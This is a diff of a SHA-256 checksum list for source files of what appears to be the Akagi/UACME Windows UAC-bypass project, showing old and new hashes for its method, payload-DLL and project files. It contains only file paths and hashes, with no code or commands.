-1cf5e1ebaf5cfb80b420fb87ff8f7d31a2b9b75dc338edb4ea6820c4beeaf36c *Source\Akagi\sup.c
-37953ab7189a09fce908de75b5ce2871aaad5a04c78dca833e13318d93ece3a8 *Source\Akagi\sup.h
+b4fb5f94264c6275b862f56ed754e72c9858c9ab44fc2ee9f0d26fe1192f8295 *Source\Akagi\Resource.rc
+cb63e87aef0a85916b7d7d5881f41e1ca9800ddb878f242126110cd467653162 *Source\Akagi\sup.c
+0da9d7e9e882862172b7deaf5f95d0c1e18beb5bab8b2c699e6087b3d248f19f *Source\Akagi\sup.h
a13d31cf040775c51471e3fe6b4863d879fefb189798a24f76189abaebdbdf27 *Source\Akagi\uacme.suppress
-f7c0c94121c78c93f553c1841b9963a756fd0cb24dd384eeb434aac6349cd380 *Source\Akagi\uacme.vcxproj
-4f3e050a0b73b1b9b06c94ca375c4b9f19352fed23d18514fb116f236049f7eb *Source\Akagi\uacme.vcxproj.filters
-cc2dfcc6ea3c2c3f81ba00d43c104466b4c6b3208563a7fd3707131160bbd1f4 *Source\Akagi\uacme.vcxproj.user
+5e9603e1877053c533994070273c4e72c39d9e0a7b26c008184acd5f7ca4cf3a *Source\Akagi\uacme.vcxproj
+e44d0f266561f7aef3b87a86d133a47af49cd920a66083804b02c889c73b4589 *Source\Akagi\uacme.vcxproj.filters
+d827c128f425851492e2e7ed1cf633fab3714c1499a41eae4e01bd8112c3ed73 *Source\Akagi\uacme.vcxproj.user
2d05d08e1436fa05e5247e876b3f187b3354b76f4cabfecbdc4e557968037424 *Source\Akagi\windefend.c
1b9e0a1f3734feb1d1f94defb48972b479225d76fc97997c9b240c0f3b6453a8 *Source\Akagi\windefend.h
-2944aac59b81edecf5a358be9b81d04d40774b8d0c0898b08ddf5de7992296d0 *Source\Akagi\bin\Akatsuki64.cd
-c29a55e1da15ee51bf197c190b4b802c03daf0ab66394c83dc9ae9409e55cc51 *Source\Akagi\bin\Fubuki32.cd
-76ebc6f06a8151396cd240d6bf772504cfc8b5eed6855e8653c60cdcf52e5d10 *Source\Akagi\bin\Fubuki64.cd
-945b6d413e4429dffc930f864595bf9f330067903a70f9d06ab93cb8106ae26c *Source\Akagi\bin\Hibiki32.cd
-92770263151595b6b152438a7e83028eee954cae818150e46d13bb1f8cc831df *Source\Akagi\bin\Hibiki64.cd
-7e1c3c9cb2ac6a7a4e822d4ac0e2fe7ae6adec19790a82fbbc8fc3a9e1f7c47c *Source\Akagi\bin\Ikazuchi32.cd
-d7928e793977925b9800926b567348517d23d7934ebb9f0992b9fc0c6b24d073 *Source\Akagi\bin\Ikazuchi64.cd
+47d2753928ca704a5544ca12fdff8583ff604ce2d440f3109ab3b6ded91b4b70 *Source\Akagi\bin\Akatsuki64.cd
+cbe156de6d8d3b5e10422f15a528050e348567ab9b98ac54b6e15b53025a9ed5 *Source\Akagi\bin\Fubuki32.cd
+d61fc7009f7fcfb12a8eab1ab024a3065bb0869fcf269794256b19e15ec6af34 *Source\Akagi\bin\Fubuki64.cd
+c1ed6f0600544df6921e7d51eb8e0f08ad853d0a3412c2962511306e7cf94add *Source\Akagi\bin\Hibiki32.cd
+0f4165ab7f6ac1b570022762d7a35aad0b61112edecfacda3a9f8ee5ade3b986 *Source\Akagi\bin\Hibiki64.cd
+83aca570f739d0c3492a0191bb4ea9f0986c5e1d0f05650f1f3945e0468eaf5f *Source\Akagi\bin\Ikazuchi32.cd
+2ca54d3cb0e1233f231a4c2dd7a576e705538dbdb53c8e11727c158bb1448513 *Source\Akagi\bin\Ikazuchi64.cd
46f01b4e452c8c6d4d62f7c99928dc13ec3a751512bfaaeebcbbbcf62523cd76 *Source\Akagi\bin\Kongou32.cd
4f336b9b9827366d686442ea6018d90e9cee1c876ea79c39a018d9fe0e164be8 *Source\Akagi\bin\Kongou64.cd
d2e98979ba296abb4cad7ab142db85da10a62b6c2193f89e206a4c2ed5ff19db *Source\Akagi\lib\AppHelp32.lib
dc7fe105fd095121932b4c483ebcbf35d729fefeab7a7fb766fe9a3953f91ef1 *Source\Akagi\lib\AppHelp64.lib
c38c4dc7d03484215e6fa531a795e80bd1951504ca6938cad5886d17adbf4a27 *Source\Akagi\methods\apphelp.h
-c994f782c64a1a18caaab60418de573ade7e87fdc964e25557ac79eb549c7cd5 *Source\Akagi\methods\carberp.c
-d9ac1c8eedf9c9d5ed6cbf0ffeeaa13ba376760ade0d1dc6750121ed48a5b63b *Source\Akagi\methods\carberp.h
+01f2327ec6dfdd859a5372f24dfaec5024fe3cd5795647991b79bbb88d19764e *Source\Akagi\methods\carberp.c
+b866af0a9a4ad85432c13dc02fbb7e360bbe069dd5e45e86de9e1a6aeb91d449 *Source\Akagi\methods\carberp.h
0182da81c73323b843725eaec652ec2f2c95231e302b765de2ce37e09c899ab9 *Source\Akagi\methods\comet.c
7619c01b21279a0f318e7f3c091f5b54f9a37425b4a083e277e0adfc11da2913 *Source\Akagi\methods\comet.h
-393ba6fbfe154be58e018066bb2edcce2abb2b6bc3a209de23a279a0edde153e *Source\Akagi\methods\enigma0x3.c
+5dbbf2af06f6bf545ab7c889fe7a6cf0653036c545aa29b8dc77086ee3304e10 *Source\Akagi\methods\comfileop.c
+7c1e67ec03370d4e97fc5947a832090bf8283641c19f7cad1cb8f3d93385bac2 *Source\Akagi\methods\comfileop.h
+4336d458f3c40c5f874bd0db1e01bf29016ddb2c8ff807bbe4b89ff29e5127ac *Source\Akagi\methods\enigma0x3.c
878dd7452a54e15999a0eab9dc22c4bc7cbb5e5b5e71cfece307349eb79e4dc5 *Source\Akagi\methods\enigma0x3.h
e297e3858f2754f7d45876c087d606a2b10e6007ff96fdc00e27db6c731f163c *Source\Akagi\methods\explife.c
1b3b895fa6b99df9055b6514e8dc5212ce61cd7d2500c2fea95085440e7b5b34 *Source\Akagi\methods\explife.h
be58d05b4f21e4cbc7a06d409c2f0002eee660d8a9017b1d103f35cdb7d9461c *Source\Akagi\methods\gootkit.c
7a01e30bf58f6e87112812e11fd81e250ecfadfe9fb1206e9f4ec06607dad714 *Source\Akagi\methods\gootkit.h
-5887a1083e6343ea5e6effbd0def4631fc988df14e0a4c2147d68cb70e90fcf2 *Source\Akagi\methods\hybrids.c
-6327a9b8e9c19adee0d56e666756dd4a0edcc327c8ed0341f11bb80e12feaaa5 *Source\Akagi\methods\hybrids.h
-3155b7598ca2aad4e77a48f0351a8436c8780384820e83422bd8c2afb12a4586 *Source\Akagi\methods\methods.c
-adb791a9ef390b95f6f603c6e88c619c5031f42724843681b1562b9356d4d65a *Source\Akagi\methods\methods.h
-fd7e8e20de8f3763a418368431c0b6b7131d940e7b775c165b095f78386b849b *Source\Akagi\methods\pitou.c
-9754f1d2195c6d2ef6a228677d1a8fb8e92318aece0c389b3f28a87eeffe9827 *Source\Akagi\methods\pitou.h
+7bb57943b4abbe72996ae58d622b62717d9378a2f97be0c115ad6fc76af87285 *Source\Akagi\methods\hybrids.c
+858ce14e3179d817220aeda054750371723c2d72e9a59a30f17a2600c38511f3 *Source\Akagi\methods\hybrids.h
+effd49a0f695a763302c42dc192647c84712670d5af96ec54c83f09aebb39583 *Source\Akagi\methods\methods.c
+ac72b99dd5d456d1a349b23a78a3b5aa99e1a855a08d0689858f451d4af0069b *Source\Akagi\methods\methods.h
+4b9ef8073d1e9ad80050a74d53c7c4f11cfed18c6252faf49b2ea00502415a1b *Source\Akagi\methods\pitou.c
+9faab51fb7a0614dcf285ea02b468aee1edb50bb00b9dda8da20260d7460d255 *Source\Akagi\methods\pitou.h
3dd668663873b0e7816a2d2e89fb53ae2a418b1338b6530a9e3a1743e8bbd3fd *Source\Akagi\methods\sandworm.c
a38afbbd8ff528662d4f61ea1f688f44778f524d18dcc08badbd182b6537d7a5 *Source\Akagi\methods\sandworm.h
629be7ba979bcf0133b6a222ac358d7c9f3b4fe2f341d284a969b1a279b7dc0e *Source\Akagi\methods\simda.c
3c3a6eb8ee56ccffedd490e87b8a2fdec7e4b09bdb2650d231f2805a27e56ade *Source\Akagi\methods\simda.h
8d95d0c5a788964202100208749ab9744180f0ea36fa222a4a3adc1d0e3f90a1 *Source\Akagi\methods\sirefef.h
-813c594498f7f79e160f0775a6886fff179e43416e7aa79709bd779ffde9e582 *Source\Akagi\methods\tyranid.c
+0f497dd2915f834f86e0185f369c114f1013475877a7087aa0873a8155d2096f *Source\Akagi\methods\tyranid.c
233335679cbdb8023211a848051420a7e9a02b72c0af89ff0e5eb19fc018edb4 *Source\Akagi\methods\tyranid.h
-7266faf9d86af33e32023964bb666bb5fb5288586a38992f020796b75c0e9b15 *Source\Akagi\tests\test.c
+508459d7352df2b65d5b5a34b14f28a3c8e5c899ee881f4f8b862b843c197247 *Source\Akagi\methods\wusa.c
+711a7d727b1ce6003348ea9e4a909bc7c6b1711fb352fe42b947c7f75003ca52 *Source\Akagi\methods\wusa.h
+2bd9ea60ba513fedcfe5e2c98b6c78ebde7ac126ac4c9d6b4f40f6d771a6a420 *Source\Akagi\tests\test.c
b073f6d614bcdc345db660edf36784d1587e3f3ab309bfb871a0ce510faa57a6 *Source\Akagi\tests\test.h
09bd7cf61a0e2bf4474e8a11f88ba61f62fe26138acabc7bac71d336232285fc *Source\Akatsuki\akatsuki.suppress
588fbc961ae8c731d7617bda839ad326cc2f92d6f468cd6de475b4c21bd03a29 *Source\Akatsuki\Akatsuki.vcxproj
060c80fea1ef21d705757ddf9c19b586a7bb17356a356d57358db8143371fe17 *Source\Akatsuki\Akatsuki.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Akatsuki\Akatsuki.vcxproj.user
-bfc16caf50161dcfbb51d148b66846def870d3856045a818c0965a5984113927 *Source\Akatsuki\dllmain.c
+e7722dff186b29d725cd56c476ab0a0439454de81ed5f905804b3a335894ba07 *Source\Akatsuki\dllmain.c
e10acf379efd906f8bf06a28e3b0b5598618c109c8a30f43e831b42f6aaf1950 *Source\Akatsuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Akatsuki\resource.h
-9977423977c6294586e91f57334ff22d53860f96a3d3df7adcd31881d78ea98b *Source\Akatsuki\version.rc
+7c519388501db074be74bf1a90119eff6193e0085081ea780cdf34a1114f54ee *Source\Akatsuki\version.rc
3f0f2bd8d770b9a92b4a5a05a621987a04ff67c79fba0264208c2cfae2eefc05 *Source\Fubuki\dll.suppress
-c391874c4c88a796f1e43dab5c049c69f5b80188511c437a234325db8320febd *Source\Fubuki\dll.vcxproj
-2b7c4bfaae209067f3e6b6e2695bd4e101075b0629c062c9c51f2c6546252c62 *Source\Fubuki\dll.vcxproj.filters
+5a69f0cae65a683c92fb0cd3139c7544ddb5d48be14e947d6b206c925e7525e3 *Source\Fubuki\dll.vcxproj
+cf19572228a04f2564f245b69ef8e0693cea38161b2e088fd3a2d254955cdd55 *Source\Fubuki\dll.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Fubuki\dll.vcxproj.user
-66cc0ce3fa6ffb15e314355328cacab9b75a7b0bcab226de0a1b4d74041bfd81 *Source\Fubuki\dllmain.c
+8ca04d5e27c6470bd1d531b508cc3ca824b79552ab1ff580810b357eee3e82ed *Source\Fubuki\dllmain.c
938d2ffe637631e182f1b8e8ebfb642aee1bc854a689b489bf1d9b30335ab5e0 *Source\Fubuki\export.def
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Fubuki\resource.h
a2b59d06ad6f6af9ac19b5b15c987c246eb059eade447b63c3113646c6ef52a0 *Source\Fubuki\unbcl.h
-1d5b354a2f9225c3e410b3fc43bf8e9984de8fff8221c9f532483d22e54ab42f *Source\Fubuki\version.rc
+dacce5219ceec64ceff5491ed45dfe2ffe7c095fcb30b74db177e3d1541bf839 *Source\Fubuki\version.rc
eccff5e3d98818d8ea5393d86379985c8eee5b0ac44d06e1c8b52b29d96cf066 *Source\Fubuki\wbemcomn.h
-039659963ca2e567fe2a2c074c068a5b6ae11ce6664f319f10755f6ea4ff681b *Source\Hibiki\dllmain.c
+1e520be61368b89979d0c5605a62c71d1965c9bcbc0b4b18d070203e21913062 *Source\Hibiki\dllmain.c
fc32b236825eaad7806a7cbed561f751496deace5cc0a3b72856d934c879a31a *Source\Hibiki\hibiki.suppress
1df0cd6cef001334dbe6877d8a68d34089f6a0f11dcebc7f1d08d3835d50cd8b *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
-a40b4cd99474e949a1e2fd0621a45eb7431761ee62f814e8a640ada57371eeac *Source\Hibiki\version.rc
-f1fddf038d62c308e7a6162e5f1d95d92d6479f00ec2bc3643d1edc500c9620a *Source\Ikazuchi\dllmain.c
+1fc3ee88bb60ffc54b1f33429125a30a09a829547a446a86e356f9cca1c7127d *Source\Hibiki\version.rc
+eb90b7b4ac53cd6f62deeb8f7028d5fecbfa3c6f03e3ad7e1c235918fbfed52e *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
c6357613fa00417abeb97834822a0d9a01b8f95d19a3e7358e00cfef88f7598e *Source\Ikazuchi\ikazuchi.suppress
706e38718d616247c8e9a0c6b6a51b5477ca6169c7126b6e26a33d99560fdc50 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
-0b23b7f61f21bda96f1515711852f3b9a981efb09623c6d7ed743f81d4a0cf9e *Source\Ikazuchi\version.rc
+8ed990126df328775e139b55ab5f192c80e7527aa45f8e5b22bf6517d239940f *Source\Ikazuchi\version.rc
82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
@@ -113,7 +117,7 @@ bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\
01c5aada277c3a7a138ab7c31beda0decee8ec28fe7525e43ca524b2b0270213 *Source\Shared\ldr.c
b22c6d2722fa9e917746502fd4615d28b9c889d7288fc737315150e0ae40ee6f *Source\Shared\ldr.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-5d1e45dfb65548af3fa7e13792d4cca37ddbb8324e7ec1c21fd9a6d9ea49922f *Source\Shared\ntos.h
+7d7466f9b0f9a1264f8c606e7171b109927507444d04b02c6ae42c755d5e0c00 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c